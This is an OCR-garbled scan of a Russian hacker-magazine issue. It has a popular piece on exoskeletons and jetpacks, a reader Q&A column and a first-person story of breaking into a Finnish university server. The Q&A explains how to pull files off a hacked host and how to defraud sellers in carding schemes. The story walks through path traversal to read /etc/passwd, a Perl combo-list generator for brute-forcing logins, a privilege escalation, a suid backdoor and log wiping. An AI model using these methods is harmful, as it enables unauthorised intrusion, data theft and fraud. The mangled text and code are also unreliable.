целиком. Все попытки привести ноги в дви- 
жение заканчивались плясками святого Вит- 
та в исполнении груды металла. Экзоскелет 
весил около 700 кг и в любой момент мог 
похоронить под собой оператора. Другой 
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проблемой, с которой столкнулись разработ- 
чики, был поиск портативного и тихого ис- 
точника энергии. В фильме «удавы» кабелей 
остались за кадром. На самом деле система 
электрических генераторов и гидравлики 
Нагсіітап занимала целую комнату. В 1971 г. 
амбициозный проект Нагсіітап был оконча- 
тельно заморожен. 

Позже, в 80-е годы, исследователь лабо- 
ратории Лос-Аламос Джеффри Мур опубли- 
ковал концепт экзоскелета РШпап. Супер- 
костюм предназначался для защиты солдат 
от всех видов современного вооружения: 
термического, химического, ядерного и био- 
логического. Конструкция экзоскелета поз- 
воляла нести тяжелое обмундирование, 
включая противотанковое и противоракет- 
ное вооружение. А бронежилет из керамики 
останавливал 50-миллиметровые пули. 
Именно эта разработка легла в основу кон- 
цепта Бобу Агтог РоѵѵегесІ, работа над кото- 
рым идет сейчас в Исследовательской лабо- 
ратории Армии США. 



ров они представляют собой непосильную 
задачу. Соединив возможности человека и 
силу механических мускулов, ученые избави- 
лись от моря проблем. Пилот стал органич- 
ной частью экзоскелета. Он просто идет, а 
машина копирует и предсказывает его дви- 
жения. Вес ВІ.ЕЕХ с полным топливным ба- 
ком - около 55 кг. В начале и в конце, когда 
силовые приводы выключены, ощущения 
обещают быть не из легких. После их запус- 
ка нагрузка резко уменьшается. Даже с гру- 
зом в 30 кг в рюкзаке оператор почувствует 
нагрузку всего в 5-7 кг. В экзоскелете можно 
свободно поворачиваться, наклоняться и да- 
же присаживаться на корточки. Главное - не 
совершать резких движений. Подпрыгнуть 
или сделать поворот на 360 градусов, напри- 
мер, не получится. Это потребует маленько- 
го энергетического взрыва, который не по 
зубам гибридному бензиновому двигателю 
от газонокосилки. К тому же сейчас мотор 
дико ревет и греется. В планах ученых уста- 
новить глушители, тогда движения в экзос- 



I В разработке ручных манипуляторов 1 
ученые еще раньше достигли 
т хороших результатов. * 



Л РОЗ-ДВО, взяпи 

Экзоскелет отлично вписывается в образ су- 
персолдата будущего. С 2000 г. американс- 
кое правительственное агентство ЭАПРА фи- 
нансирует национальную программу по соз- 
данию экзоскелета. В разработках принима- 
ет участие калифорнийский университет 
Беркли, Национальная лаборатория Оук Рид- 
жа, исследовательская группа Загсов из Солт 
Лейк Сити и компания МіІІеппіит Эеі:. Уже в 
следующем году опытные образцы будут 
держать полевые испытания. 

В разработке ручных манипуляторов уче- 
ные еще раньше достигли хороших резуль- 
татов. Поэтому исследователи университета 
Беркли начали с ног. Экзоскелет для нижних 
конечностей ВЬЕЕХ - это стальные ходули, 
которые жестко крепятся к подошве армейс- 
ких ботинок и фиксируются чуть выше коле- 
на. Когда оператор сгибает ногу, каркас вы- 
пирает на 15 см. В остальных положениях 
экзоскелет плотно облегает конечность и 
почти сливается с ней. Блок питания и рюк- 
зак для поклажи висят за спиной, лямки пе- 
рекинуты через грудь. Эти три точки на теле 
человека были выбраны для крепления не 
случайно. Так можно длительное время но- 
сить груз, не приобретая потертостей и си- 
няков. Сеть из 40 сенсоров непрерывно ана- 
лизирует движения оператора. Эта инфор- 
мация в реальном времени стекается на 
центральный компьютер, и 6 гидравлических 
механизмов перераспределяют нагрузку та- 
ким образом, чтобы сохранялось равнове- 
сие. Как и предсказывал Хайнлайн, исполь- 
зование экзоскелета не требует специальных 
навыков. Никаких тебе джойстиков или кла- 
виатур для управления. 

Человек, когда ходит, бессознательно 
производит сложнейшие математические 
расчеты. Даже для современных компьюте- 



келете станут мягче, чем у кошки. Отводить 
тепло нужно затем, чтобы экзоскелет не све- 
тился на инфракрасных радарах. 

Экзоскелет от Загсов поспел этим летом. 

В основе его работы лежит все та же гид- 
равлика. В этом костюме супермена можно, 
не утомляясь, нести груз весом 100 кг. Глав- 
ная задача, которую взялись решать иссле- 
дователи, - создание нового привода. Бен- 
зиновый двигатель с запасом топлива носить 
на спине стремно. 

Роѵѵег Аззізі Зиф детище японских уче- 
ных, работает на сжатом воздухе, поступаю- 
щем по гибким трубкам в пять пневматичес- 
ких приводов - на пояснице, в локтях и коле- 
нях. Пластины, размещенные на всех основ- 
ных группах мышц, регистрируют их малей- 
шие сокращения. Электромиография - пер- 
вый шаг к нейромускульному человеко-ма- 
шинному интерфейсу (биопорту). Когда 
нервная система человека станет главным 
командным пунктом экзоскелета, движения 
в костюме будут естественными, и он станет 
реальным продолжением тела оператора. 

Тем временем в Институте военных нано- 
технологий при МІТ начали разработку моле- 
кулярного экзоскелета. Такая кольчуга будет 
отклонять вражеские пули и оказывать пси- 
хологическое давление на противника. Мяг- 
кий и невидимый материал может при необ- 
ходимости затвердевать, превращаясь в ме- 
дицинский корсет, например если солдат 
был ранен. 

Л ГИГОНТСКИЕ ПРЫЖКИ 

Когда в нашу школу завезли новый спортив- 
ный инвентарь, девчонки разобрали хулаху- 
пы, пацаны - новенькие баскетбольные мя- 
чи. Мой же взгляд сразу упал на выкрашен- 
ный в зеленый цвет агрегат с надписью 
«Кузнечик». Под моим весом пружина не хо- 
тела распрямляться, но меня уже ничто не 



Я -СУПЕРИЕН! 




Во время испытаний экзоскелета Роѵѵег Аззізі 5иіі 
хрупкая медсестричка подняла пациента весом 70 кг 




Экзоскелет ВЬЕЕХ является главным претендентом 
на перевооружение Армии США 




Шоу Зіеіагс обыгрывает идею экзоскелета. Человек 
находится в центре шагающей шестиногой машины. 
Вращающаяся платформа оборудована «рукой» с 
пневматическим манипулятором 
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могло остановить. С ревом раненого кроли- 
ка-микроцефала я носился по залу и был на 
седьмом небе от счастья. Позже, наблюдая, 
как «баскетболисты» лихо отмеряют стомку 
своими штангенциркулями, я ловил себя на 
мысли: «Как быстро бы я бежал, будь рос- 
том повыше». Ответ пришел из компании 
Аррііеб Мойоп, создателей экзоскелета 
Зргіпдѵѵаікег. Нехитрая конструкция как бы 
удлиняет ноги и добавляет им искусствен- 
ную мышцу. Умная система рычагов позво- 
ляет распределить вес человека. А пружина 
на каждом шаге выталкивает его вверх. В 
результате можно развить скорость до 30 
км/ч. Использование единственной пружины 
предотвращает волочение ног, поэтому по- 
ходка в экзоскелете Зргіпдѵѵаікег, как у су- 
пермодели. В будущем планируется перейти 
с батарей на электрические сервомоторы. 

И все-таки Зргіпдѵѵаікег - штука очень доро- 
гая и громоздкая. Шум при ее использовании 
стоит страшный. Ну какие это сапоги-скорохо- 
ды или летающие сандалии Аполлона? А есть 
и такие? Конечно, есть. Например, РоѵѵегЗкір 
и Капдоо Зитрз с долговечными пружинами 
на подошве. Нагрузка при ходьбе снижается 
на 60-70%. Высота прыжков - до 2 м. Со сто- 
роны кажется, что стадо кенгуру несется на 
водопой. Обе модели можно свободно приоб- 
рести в магазинах и в интернете по цене 850 
евро и 200 долларов соответственно. 

Об отечественных сапогах-скороходах пер- 
вым написал журнал «Техника - молодежи», 
было это еще в 1 976 г. Сегодня устройство 
«Сайгак», разработанное в Уфимском авиаци- 
онном университете, запущено в мелкосерий- 
ное производство. С конвейера сошли 30 но- 
веньких кирзачей. Сапоги работают по прин- 
ципу дизеля. Под ступней установлен мик- 
родвигатель внутреннего сгорания. Когда че- 
ловек делает шаг, поршень сжимает топлив- 
ную смесь в цилиндре. Происходит взрыв, 
который выталкивает ногу вверх. Человек при 
этом подлетает на четверть м в высоту и 3 м 
в длину. «Сайгак» позволяет развить скорость 
от 20 до 50 км/ч. На 100 км пробега расходу- 
ется два стакана бензина. Вес пары сапог - 
2,3 кг. Не так давно разработан зимний вари- 
ант скороходов с шипами. За свою разработ- 
ку российские ученые хотят 1 00 миллионов 
долларов. Стоимость «Сайгаков» в магазине 
может составить до $300-400. 

ЧЕПОВЕК-РПКЕТП 

К карнавальному костюму Супермена прила- 
гается одна из самых идиотских инструкций 
в мире: «Ношение этого костюма не помо- 
жет подняться в воздух». Немногие знают, 
что реактивные ранцы Зеі Раск или 




ВоскеШеК существовали на самом деле. А 
некоторые функционируют до сих пор. 
ВоскеШеИ были разработаны в США в конце 
50-х гг. Не найдя практического военного 
применения, они попали в руки Говарда Гиб- 
сона, дублера Чака Норриса. На сегодня из- 
вестно о существовании, как минимум, трех 
реактивных ранцев. Два из них принадлежат 
компании Воскеітап Іпс. С конца 80-х она 
шокирует толпы людей нереальными пируэ- 
тами в воздухе, срывая куш от $25 000 за 
выступление. Самые знаменитые полеты 
состоялись в Диснейленде, на открытии 
Олимпийских игр 1 984 г. в Лос-Анжелесе и 
во время турне Майкла Джексона. Третий 
ранец модели ВВ-2000 появился на свет в 
январе 1995 с подачи людей, которые рань- 
ше работали на Гибсона. Новый ВоскеШеК 
собрали буквально на коленке в магазине 
аудиотехники в Хьюстоне. Разработка обош- 
лась в $100 000. Испытания провел старей- 
ший пилот ВоскеШеК в мире, «человек- раке- 
та» Билл Сьютор. Во время подъема он раз- 
вил скорость 1 1 2 км/ч, взлетев на высоту 60 
м. Общее время полета составило 30 се- 
кунд, что на 9 секунд больше, чем у первых 
ранцев. Но история получила криминальную 
развязку. Люди один за другим гибли за ме- 
талл. Последний раз ВВ-2000 видели на 
праздновании победы Ноизіоп Воскеіз в 
чемпионате ІМВА в июне 1995 г. Дальнейшая 
его судьба неизвестна. В 1 999 г. созданием 
ВоскеШеК занялась группа энтузиастов из 
Алабамы и Миссисипи. Но на поиске дета- 
лей энтузиазм, видимо, и иссяк. 

Вкратце о принципах работы ВоскеШеІГ 
Реактивный ранец закреплен на оптоволо- 
конном корсете весом более 60 кг. Правой 
рукой пилот регулирует подачу перекиси во- 




Экзоскелет ЗргіпдѴѴаІкег на ровной поверхности раз- 
вивает скорость 30 км/ч 





дорода. Левой контролирует отклонения от 
курса. Под давлением азота из сопел выры- 
ваются мощные струи горячего пара. Окру- 
жающие слышат громкий рев. Пилот набира- 
ет высоту, отклоняется в сторону, совершает 
поворот на 360 градусов и, как колибри, за- 
висает в воздухе. Он знает, что запасов топ- 
лива хватит ровно на 30 секунд полета. Точ- 
ность приземления составляет считанные 
сантиметры. Теоретически ВоскеШеК может 
подняться на высоту 2800 м над Землей, 
практически - 20-30 м. Во время выступле- 
ния пилот пролетает более 300 м на скорос- 
ти 50 км/ч. Мощность генератора - 800 ло- 
шадиных сил. Максимальный подъемный вес 
- 140 кг. Дети пилотов ВоскеШеК называют 
своих отцов суперменами, попробуй с ними 
поспорить. 

^КОРПСОНЧИК, ДОРОГОЙ 

После Бэтмена и Супермена звание мирового 
летуна по праву принадлежит Карлсону. С ним 
чаще всего и сравнивали летательный аппарат 
ЗоІоТгек ХРѴ. В декабре 2000 г. персональный 
двухвинтовой вертолет впервые оторвался от 
Земли. Правда, всего на 60 см. Продолжи- 
тельность полета составила 26 секунд. Вскоре 
был заявлен новый прототип. На смену двух- 
тактному поршневому двигателю пришел дви- 
гатель внутреннего сгорания. Для изготовле- 
ния базовых узлов алюминию предпочли ти- 
тан. Во время многочисленных испытаний 
трое штатных пилотов налетали в общей 
сложности 63 часа, в том числе при скорости 
ветра до 1 2 узлов в час. Создатели успешно 
отчитались перед БАКРА за 2/3 этапов разра- 
ботки. Однако в декабре 2002 ЗоІоТгек неожи- 
данно потерпел аварию. Говорят, из-за про- 
ливного дождя размякли веревки привязи, 
они попали в туннельные вентиляторы. БАРРА 
отговорок не приняла. ЗоІоТгек подарили ка- 
лифорнийскому музею авиации. А осенью 
2003 г., на этот раз без привязи, взлетела мо- 
дель Зргіпдіаіі ЕРѴ-4. Летательный аппарат 
развивает скорость до 100 км/ч. Максималь- 
ная дальность полета - 120 км. Скорость на- 
бора высоты - 550 м/мин. 

Слава русского Карлсона досталась одноме- 
стному десантно-штурмовому вертолету 
«Юла». Разработка омского аэрокосмического 
объединения «Полет» имеет фюзеляж телеско- 
пической конструкции и двухлопастный несу- 
щий винт с воздушно-реактивными двигателя- 
ми на лопастях. До ранцевого вертолета «Юла» 
не дотягивает хотя бы потому, что имеет крес- 
ло и амортизаторы. Впрочем, и так «Юла» - 
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свежий взгляд на концепцию, уходящую корнями в 1922 год. Как расска- 
зывает автор Виктор Котельников, сложнее всего было преодолеть цент- 
робежную силу. Она увеличивала вес двигателей в сотни раз, что могло 
привести к разрушению конструкции. Решение позаимствовали у Лео- 
нардо да Винчи. Аппарат летает на всех видах топлива, кроме ацетона. 
За сиденьем расположен баллон с газом на случай аварийной посадки. 
Под крыльями - пилоны для крепления ракет. Во время прыжков с само- 
лета винт за спиной может раскрываться автоматически. Масса «Юлы» - 
всего 20 кг. В сложенном виде вертолет превращается в полутораметро- 
вый сверток. Дальность полета составляет 300 км, максимальная ско- 
рость - 120 км/ч, потолок высоты - 1000 м. Как пишут на форумах: 
«Вышлите прайсы». Закрытые испытания «Юлы» состоялись еще в 2002 
г. 

А ВМЕСТО ЗНКПЮЧЕНИЯ 

Если Супермен такой крутой, почему он носит свои красные трусы 
поверх штанов? Хай-тек в корне поменял представление о суперме- 
нах. Настоящий супермен сегодня - это не детина с железными мыш- 
цами и даже не ботан, забивающий голову полезной и бесполезной 
информацией. Супермен тот, кто остается на гребне волны, не боит- 
ся заглянуть в будущее, использует последние достижения цивилиза- 
ции, чтобы изменить себя и мир вокруг. Есть сотни способов на 
мгновение взлететь над всеми, стать сверхчеловеком. Хочешь прове- 
рить, на что ты реально способен? Так действуй! 
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\Ц/ Есть маза, что мою переписку мониторят. Как 
пробить эту тему? 

0 Есть маза, что твоя почтовая служба пишет логи по соединениям с 

РОРЗ и работе ѵѵеЬтаіІ. Внимательно просмотри все подключения и 
сравни используемые адреса со своим ІР'шником. Если там вписаны 
совсем незнакомые адреса, следует бить тревогу: менять пароль и секретный 
вопрос, также поможет ограничение доступа к ящику для всех адресов, кроме 
определенного ІР (или целого сабнета твоего провайдера, если у тебя не ста- 
тичный адрес). Если же в логах все чисто, но ты на 100% уверен, что твою поч- 
ту читают неприятели, прочеши сетку в поисках сниффующих «братьев по ору- 
жию». Но еще лучше будет попросту заюзать шифрованный канал для досту- 
па к почте. Прокатит и згтйр/рор оѵег 55І_- и 55Н-туннелинг. Если же ты пок- 
лонник ѵѵеЬ-почты, следует выбирать безопасное подключение и проверять 
почту только по Іпйрз. А вообще особенным параноикам я бы посоветовал ра- 
ботать через Іійрз-прокс, который зашифрует и обезопасит весь пропускае- 
мый трафик. 



® 

® 



Ты что-то сказал про ЗЗН-туннелинг. 
Расскажи подробнее, я слабо понимаю. 



В самых общих чертах и одном конкретном случае это работает так. 
Пользуясь 55Н-клиентом, например болезненно знакомым ЗесиСВТ 
(версия 4.1.8 есть на ѵѵѵѵѵѵ.ѵапбуке.сот), ты подрубаешься на удаленный сервак. Ес- 
ли там разрешены внешние подключения, ты сможешь подрубаться уже на дру- 
гие машины извне: проверять почту, вести переговоры в ісц/ігс и т.д. От тебя до 
55Н-машины поднимается зашифрованный канал, куда никакой чекист или сни- 
фающий хакерюга не воткнется. Расскажу, как все работает у меня. Я исполь- 
зую Вііѵізе Типпеііег (ѵиш.Ьііѵі$е.сошДиппеІіег.ІіііпІ), который поставил после внезап- 
ного глюка ЗесигеСВТ. Настроив коннекг со своим РгееВЗР-сервером в Европе, 
я открываю на локальной машине 25 порт, соединения с которым форвардятся 
на $тІр.дашеІап(І.ги:25 через мою европейскую машину. То же самое работает и для 
ІВС. 127.0.0.1:6667 уходит в ігс.еМпІ:6667, и весь трафик снова шифруется! Система 
работает на 5+, и проблема заключается лишь в обладании *піх-шеллом. 



® 

® 



Будь конкретный и задавай конкретные 
вопросы! Старайся оформить свою проблему 
максимально детально перед посыпкой в 
Наск-ІОР. Только так я смогу действительно 
помочь тебе ответом, указать на возможные 
ошибки. Остерегайся общих вопросов типа 
«Как взломать интернет?», ты лишь потра- 
тишь свой почтовый трафик. Трясти из меня 
фришки (инет, шеллы, карты] не стоит, я сам 
живу на гуманитарной помощи! 



Моего босса на работе кто-то завел, и теперь 
он на меня напирает, говоря, что мы все об- 
делаемся, если я не поставлю какой-то ИАОС- 
протокол. Что это такое? 



Меѣд/огк Ассезз Оиагапйпе Сопйоі. ІТ-бизнес напоминает ТазЫоп- 
индустрию. Некая новая модная шняга объявляется каждый год, и все 
админы-модники начинают верить, что без нее завтра не наступит и все будут 
держать тебя за деревенского лохана. Теперь удаленным офисным юзерам 
полагается проходить специальную верификацию перед подключением к сет- 
ке. Для этого на удаленной машине должен крутиться ѴѴіп98 ЗЕ, ѴѴіп ММ, ѴѴіп 
2К, ѴѴіп ХР или что поновей. Скажем, ты стал тем самым удаленным пользо- 
вателем - для МАСЮ-темы тебе вписали специальный идентификационный 
скрипт, который можно создать в ѴѴіпсІоѵѵз Зегѵег 2003. Делается это с по- 
мощью Соппесйоп Мападег Асіппіпізігаііоп Кй (СМАК) из поставки Зегѵег'а. По- 
нятно, что для проведения проверок на другом конце потребуется и выделен- 
ная ѴѴіп 2КЗ машина, где будет крутиться Пеплоіе Ассезз Оиагапііпе Адепі зегѵ- 
ісе (именуемый ВОЗ.ЕХЕ), идущий в Резоигсе Кіі'е. С коннектом проходит це- 
лая серия проверок на подлинность, включая обработку РШІІЗ'ом и Іпіегпеі: 
АиЙпепйсайоп Зегѵісе'ом. В настройках ИАОС ты задаешь зоны так называемо- 
го карантина, доступ куда должен быть ограничен описанной выше усложнен- 
ной верификацией. На ѵшжигііувсишт есть добротная статья, в которой ты 
найдешь самый полный ответ на твой вопрос. 
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Я взломал ІМТ-сервак и теперь могу запускать 
там Кр.ехе. Но ничего больше делать не полу- 
чается. Что можно поднять с этого? 




Мне с трудом представляется ситуация, когда ты можешь завести 
только РТР-клиент и ничего кроме. Однако данность есть данность. Учи- 
тывая всю виртуальность ситуации, представим, исключительно виртуально, 
что известны пути к файлам, которые хотелось бы слить из системы. На ло- 
кальную машину можно поставить РТР-сервер. В случае Винды сработает аб- 
солютная классика - Зегѵ-ІІ (ѵѵѵѵѵѵ.зегѵ-и.сот). Сервер запускается, и можно под- 
рубаться к себе самому, пользуясь все тем же Йр на удаленной машине. Пот- 
ребуется команда рій для закачивания искомого файла на свой локальный Йр. 

Все описание команд Йр доступно при запуске с параметром Іпеір. 




но селлер делает рассылку лишь на адрес, 
приписанным к моему левому РауРаГакку. Что 
делать? 

( П } 

у Злобные хакеры видят для себя здесь л ишь два пути . Один - развод- 
ка продавца на поблажку, согласие выслать товар на другой адрес. 
Здесь нужна лишь красивая легенда: вроде как покупатель находится на отды- 
хе, и ему срочно нужен подарок для девушки. Такой прогон обычно осущес- 
твляется недолгой перепиской, и затраченное время окупится получением же- 
ланного добра. Особенно способствует удаче работа с аукционного аккаунта, с 
которого было совершено множество транзакций, имеется куча положительных 
фидбэков. Подобные проверенные аккаунты хакер покупает у коллег по цеху 
или похищает у законного юзера. Другой путь заключается в разводке «Палки» 
на вписку адреса, отличного от ЬіІІіпд'ового с кредитки. Сие получается со зна- 
чительно большим скрипом. Также виртуальные злодеи порой обходят станда- 
ртные РауРаІ-заморочки проведением платежа в другой системе, менее рьяно 
мониторящей кардеров. Большинство селлеров принимают платежные бумаж- 
ные чеки, к примеру. 



Ѵз/ Что такое ОИЗ-инкапсуляция? Как ее можно 
заюзать для халявного инета? 

( П } 

\ ѵ Эта технология возникла сразу после появления гостевых аккаунтов 

у біаіир-провайдеров. Хитрозадым перцам не нравилось, что по госте- 
вому логину можно лазать лишь по сайту провайдера, и они научились инкап- 
сулировать любой инет-трафик в пакеты 0145-запросов. По умолчанию про- 
вайдерские РМб-серверы принимали безо всяких ограничений пользова- 
тельские запросы, которые, в свою очередь, отправлялись до конечного 
патезегѵег'а - нашей, хакерской машины. Сервант позволял преобразовывать 
ОМЗ-запросы в хорошо знакомый ТСР-трафик. Понятно, что было необходи- 
мо совершить инкапсуляцию ТСР в ІЮР-протокол, на который опирается РМ5. 
Трафик паковался в 0145-пакеты на фэйк-сервере, а расшифровывался уже 
локально - специальным клиентом, который также входил в поставку. Наибо- 
лее знаменитым проектом оказался ИСТХ (Матезегѵег Тгапзіег РгоіосоІ, 
Іііір:/(ге5Іітеаі.пеі/ргоіес1з/п$іх). Отечественным продолжением стал Х-релиз X- 
ргоху (ѵши.хакер.ги/ро$1/16337). 



Ф Меня постоянно сканят ІВС админы! У них что, 
паранойя? 

( Л } 

У меня нет докторской степени, чтобы судить наверняка о наличии 
психического недуга администраторов ІПС, но то, что все они дерну- 
тые, легко заметить на любой поинтовке ;). Впрочем, шутки в сторону. Льви- 
ная доля современных I ВС-сетей проводит проверку юзерских хостов на отк- 
рытые соксы. Для этого запрашивается коннект на 1080 и иногда 80 порты. Ты 
можешь иметь соке на своем хосте, однако он не должен быть общедоступ- 
ным. В дальнейшем разумно изучать МОЮ (Меззаде ОТ ТІпе йау), где каждый 
сканирующий на зоекз I ВС-сервер заявляет о проводимом процессе. Там же 
указывается, откуда пойдет скан. Если твой файрвол показывает другой хост, 
тогда твою подсеть сканируют братья-хакеры и цели они преследуют совсем 
другие :). Читай МОТО и ВЕС! 



Ф Зачем менять или убирать инфу по версии 
стоящих у меня в Упих-системе демонов? Это 
же не шильдик на багажнике моего авто. 



Ф 



Расскажу, как работает один знакомый хакерюга. Он собирает 
портсканы (с версией всех демонов) с огромного диапазона сетей, сор- 
тирует списки по наименованию демонов. Имеет тысячу ІР с определенной 
версией и ждет лучших времен, когда Ьидігац раструбит о выходе эксплойта по 
теме сего демона. Новости мониторятся предельно зорко, так что довольно 
часто хакерюга успевает обогнать админов и порой даже СѴЗ'ы :), не поспева- 
ющие со своевременным апгрейдом. Ты не хочешь попасть в его список и ожи- 
дать, когда Ьидігац предаст твое бренное серверное тело сожжению? Затирай 
инфу по демонам! 



Ф 

Ф 



Как же мне смыть из системы инфу по ВСЕМ 
демонам? 



Перечисление прочистки ВСЕХ демонов *піх займет несколько 
выпусков журнала. Я дам наводки лишь на самые ходовые. Любимый 
ОрепЗЗН спасается модификацией файла орепззіп -3 .х/ѵегзіоп . И , где правится 
строка #сІеТіпе 35Н ѴЕРЗІОМ "ОрепЗЗН З.х": ставь что твоей душе угодно. Для 
ЗепсІтаіІ поможет обработка /еІс/таіІ/зепсІтаіІ.сТ с заменой $і на любую 
другую версию демона, например СоттипіСаІе Рго 5МТР. Полностью 
затирать инфу по серверу не стоит, ибо ее часто запрашивают шаіі-клиенты в 
обязательном порядке и, не узнав версии, ругаются. Вместо $Ь ставится дата 
билда, например ЗтІрСгееІіпдМеззаде^Зі Маіізегѵег; Ти, 7 Лип 1983 12:00:00. 
В случае Арасіпе 2.0 в ход пойдет ИИрсІ -2.0 .х/ИНрсІ/і псіисіе/ар геіеазе . И с 
правкой #бейпе АР5ЕВѴЕВВА5ЕРПСЮІІСТ "Арасііе" #с!еТіпе 
АР_5ЕПѴЕП_МАЗОПѴЕП5ІОІ4 "2" #сІеТіпе АР_5ЕРѴЕР_МІМОРѴЕР5ІОМ "0" Ш\пе 
АР_5ЕПѴЕН_РАТСНІ_ЕѴЕІ_ "50". Обработка других демонов аналогична и требует 
лишь поверхностного рассмотрения конкретного случая. 



Ф 

Ф 



Я админю хостинг с Арасбе, и некоторые наши 
клиенты генерят просто нереальный трафик. Как 
бы перекрыть трубы паре конкретных проектов? 



К сожалению, подобное не входит в стандартную поставку Апача и 
требует вписки дополнительного модуля. По собственному опыту 
наиболее рабочим оказывается тосИІігоШе (ѵѵш.$пегі.сот/$о(іѵѵаге/то(І_ШгоШе). Он 
позволяет контролировать и ограничивать нагрузку по виртуальным хостам, 
директориям или конкретным юзерам системы. Также поддерживается работа 
с трафиком относительно запросов с конкретного ІР или от авторизовавшегося 
юзера. С целой серией параметров для установления единой политики по 
трафику можно построить очень сбалансированную систему. При экономии 
трафика и обрубке злоупотребляющих юзеров наиболее важные посетители 
все равно будут в теме. Что-то подобное ты мог наблюдать на ІіѵеіоигпаІ.сот пару 
лет назад, когда платные юзеры имели всегда стабильный коннект с сервером, 
а фришникам приходилось ждать вторичного оживления сервера при 
случающихся перегрузах. 






Ш юбой взлом требует некоторых усилий и сообразительности. Даже при безысходной раскладе хакер должен найти правильное 
решение и продвинуться на шаг вперед. Это знают все, но редко кону удается найти выход из, казалось бы, неразрешимой 
ситуации. Однако приненян смекалку и опыт, человек способен пролезть в любую дырку. Это доказывает недавно проделанный 
мною взлом финской математической лаборатории. 




РЕППЬНЫЕ ИСТОРИИ ХПКЕРСКИХ ЗЛОДЕЙСТВ 




В ся история началась с посеще- 
ния одного зарубежного ре- 
сурса (не буду уточнять, како- 
го), который специализировал- 
ся по некоторым интересным 
услугам. Все бы ничего, да вот 
только пропускал он лишь изб- 
ранных клиентов. Зайдет, ска- 
жем, хакер с американской прокси на стра- 
ницу регистрации, аккуратно заполнит все 
поля, а подлый скрипт напишет, что домена 
нет в списке разрешенных. Я долго ломал 
голову, пока не кликнул по ссылке «АЬоіЛ». 
Там черным по белому было написано, что 
посещать ресурсы портала разрешено жите- 
лям Франции, Италии и... Финляндии. К со- 
жалению, у меня не было прокси-серверов 
из вышеперечисленных стран, поэтому мне 
захотелось найти бажный сервер в какой-ни- 
будь доверенной стране и проверить его на 
безопасность. Начал я со страны Микки Хак- 
кинена - не терпелось посмотреть на горя- 
чих финских сисадминов в работе. 



Дроковые исходники 

Первым делом я начал ворошить Веб. Поиск 
бажных скриптов - занятие несложное, для 
взлома не нужно прибегать к помощи специ- 
альных эксплойтов, поэтому у меня был 



вполне реальный шанс поймать удачу за 
хвост. В качестве поисковой системы я заю- 
зал доодіе.сот. Этот поисковик обладает гиб- 
кими настройками, поэтому идеально подхо- 
дит для сканирования уязвимых сценариев. 

Я воспользовался поисковыми выражениями 
зііе и йіеіуре, которые определяли домен и 



расширение файла соответственно. Стоило 
мне оформить запрос в виде зіІе:й 
ТіІе1уре:сді, как поисковик выдал множество 
ссылок на различные скрипты. Почему сді? 
Да просто потому, что именно в этих сцена- 
риях чаще всего встречаются глупые ошиб- 
ки. Последовательно открывая каждый сайт 
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в домене і\, я насиловал параметры скрип- 
тов, надеясь, что у какого-нибудь сценария 
сорвет крышу :). 

Но удача не спешила мне улыбаться. К то- 
му моменту, когда я дошел уже до 1 0 страни- 
цы, не было найдено ни одного бажного сце- 
нария. Возможно, я уже устал и потерял бди- 
тельность, а может, скрипты действительно 
были бронебойными. В любом случае, я еще 
не сканировал сервер на скрипты рі и рМр, 
поэтому повода для грусти пока не было. 

Наконец, мне посчастливилось наткнуться 
на один из серверов финской математичес- 
кой академии. Это было сразу видно по наз- 
ванию, а потом и по содержанию сайта. 
Скрипт назывался 5оигсе_дзІ.сді. Он выпол- 
нял функцию вывода на экран исходника, 
переданного в качестве параметра. В моем 
напряженном мозгу тут же закралось подоз- 
рение на то, что в сценарии отсутствует про- 




верка на пайп, пиІІ-байт и другие злые вещи. 
Но догадку надо было проверить. 

Запрос на выполнение команды был сразу 
отклонен. Вместо вывода от бинарника ісі на 
экране царила пустота. Я попробовал вывес- 
ти ../../../../../еіс/раз5ѵѵсІ%00, но запрос так- 
же успешно отфильтровался. Потом попро- 
бовал убрать нулевой байт и обновить стра- 
ницу. Надо же, какой конфуз - файл успешно 
отобразился на экране. Ну вот, еще один го- 
ре-кодер. Однако радости от этого мне было 
мало - одной читалкой файлов много не сде- 
лаешь. По крайней мере, прокси-сервер точ- 
но не поставишь. Я это прекрасно понимал, 
но сдаваться даже не думал ;). 

Л СИПП ПЕРЕБОРП 

Я попробовал соединиться с 22 портом ма- 
тематического шелла. Соединение не 
фильтровалось. Первое, что пришло в голо- 
ву, - попробовать сбрутить себе рабочий 
аккаунт. На самом деле такой шаг себя оп- 
равдывал - файл раззѵѵсі содержал порядка 
50 аккаунтов, поэтому вероятность подбора 
пароля была большая. Разумеется, я не хо- 
тел перебегать по словарю - этот процесс 
затянулся бы на долгие дни. Решено было 
попробовать пару ІодіпМодіп в качестве сис- 
темного аккаунта. Для этого я сохранил 
раззѵѵсі в отдельный файл и написал не- 
большой парсер на регі, который генериру- 
ет комбо-лист. Затем этот файл будет 
скормлен какому-нибудь переборщику. 



Комбо-лист для Финских паролей 



#!/и$г/Ьіп/регІ 

$іп=$АК6Ѵ[0]; 

$оиі=$АК6Ѵ[1]; Ш Определим параметры скрипта 

ехіі ргіпі "ІІ$е $0 $іп $оиі\п" ипІе$$ ($оиі); 

орепОІГЗіп"); 

ореп(01Л,">$оиі"); 

йіІе(<ІЛ>){ 

сііотр; 

іі (~/$Іі$/) { Ш Запишем только валидные аккаунты 
($и,@ип(ІеІ)=$рІіі 

ргіпі 01ІТ "$и:$и\п"; іііі В виде пары Іодіп:Іодіп 



сІозе(Ш); 

сІозе(ОІІТ); 

Скрипт прост, как две копейки, это видно 
по исходнику. Что примечательно, сценарий 
парсит только аккаунты с валидными шелла- 
ми. Другие мне на фиг не нужны. Было ре- 
шено брутать программой ВгііШз под Винду. 
Прежде чем что-то запускать, мне потребо- 
валось оформить комбо-лист и проверить 
баннер РТР-сервиса. Когда все было сдела- 
но, я запустил процесс перебора. Интуиция 
меня не подвела, и уже через минуту у меня 
был обрученный аккаунт. Быстро прочекав 
операционку, я понял, что на сервере кру- 
тился старенький ВН 7.2 с бажным ядром 
2.4.24. Думаю, не стоит говорить, каким 
эксплойтом я поднял свои привилегии, - все 
понятно без слов. Однако у меня был пе- 
чальный опыт, связанный с установкой рут- 
китов на ВН 7.0-7.2. После инсталляции би- 
нарники начинали жутко глючить, что застав- 
ляло администраторов задуматься о безо- 
пасности :). Поэтому было решено использо- 
вать старый дедовский прием, который зак- 
лючался в создании суидного шелла в комп- 
лекте с логвайпером. Содержимое такого 
нехитрого бэкдора не раз приводилось на 
страницах X, поэтому повторять его код не 
стану. Я обозвал свое творение именем «аі» 
и закинул его в /изг/Ьіп. Теперь нестрашно, 
что на бинарнике будет светиться суид, - 
ведь софтина аі требует дополнительных 
привилегий. В качестве логвайпера я выбрал 
